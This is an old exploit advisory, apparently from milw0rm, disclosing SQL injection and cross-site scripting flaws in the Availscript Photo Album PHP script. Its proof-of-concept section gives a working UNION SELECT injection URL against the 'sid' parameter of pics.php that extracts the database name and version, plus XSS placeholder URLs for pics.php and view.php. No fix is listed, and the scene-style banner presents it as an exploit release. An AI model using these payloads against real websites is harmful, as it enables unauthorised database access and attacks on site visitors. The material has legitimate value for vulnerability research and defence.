48 lines
No EOL
1.6 KiB
Text
48 lines
No EOL
1.6 KiB
Text
###########################################################
|
|
#
|
|
# ___ __ __ __ __
|
|
# /\_ \ /\ \\ \ /\ \/\ \
|
|
# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____
|
|
# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\
|
|
# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_
|
|
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
|
|
# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/
|
|
#
|
|
# security breakd0wn!
|
|
###########################################################
|
|
#
|
|
# Title: Availscript Photo Album (pics.php) Multiple Vulnerabilities
|
|
# Vendor: http://www.availscript.com/
|
|
# Vulnerable Version: N/A
|
|
# Fix: N/A
|
|
#
|
|
###########################################################
|
|
#
|
|
# c0ntact: sl4x.xuz[at]gmail[dot]com
|
|
# d0rk: "muahaha"
|
|
# stop lammo
|
|
#
|
|
###########################################################
|
|
|
|
######################
|
|
1. Information
|
|
######################
|
|
With this script you can add pictures in categories create album or wallpaper website.
|
|
|
|
######################
|
|
2. Vulnerabilities
|
|
######################
|
|
SQL Injection in "pics.php" in the "sid" parameter.
|
|
Cross Site Scripting in "pics.php" in the "sid" parameter.
|
|
Cross Site Scripting in "view.php" in the "a" parameter.
|
|
|
|
######################
|
|
3. PoC
|
|
######################
|
|
http://localhost/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12--
|
|
http://localhost/path/pics.php?sid=[XSS]
|
|
http://localhost/path/view.php?a=[XSS]
|
|
|
|
###########################################################
|
|
|
|
# milw0rm.com [2008-09-09] |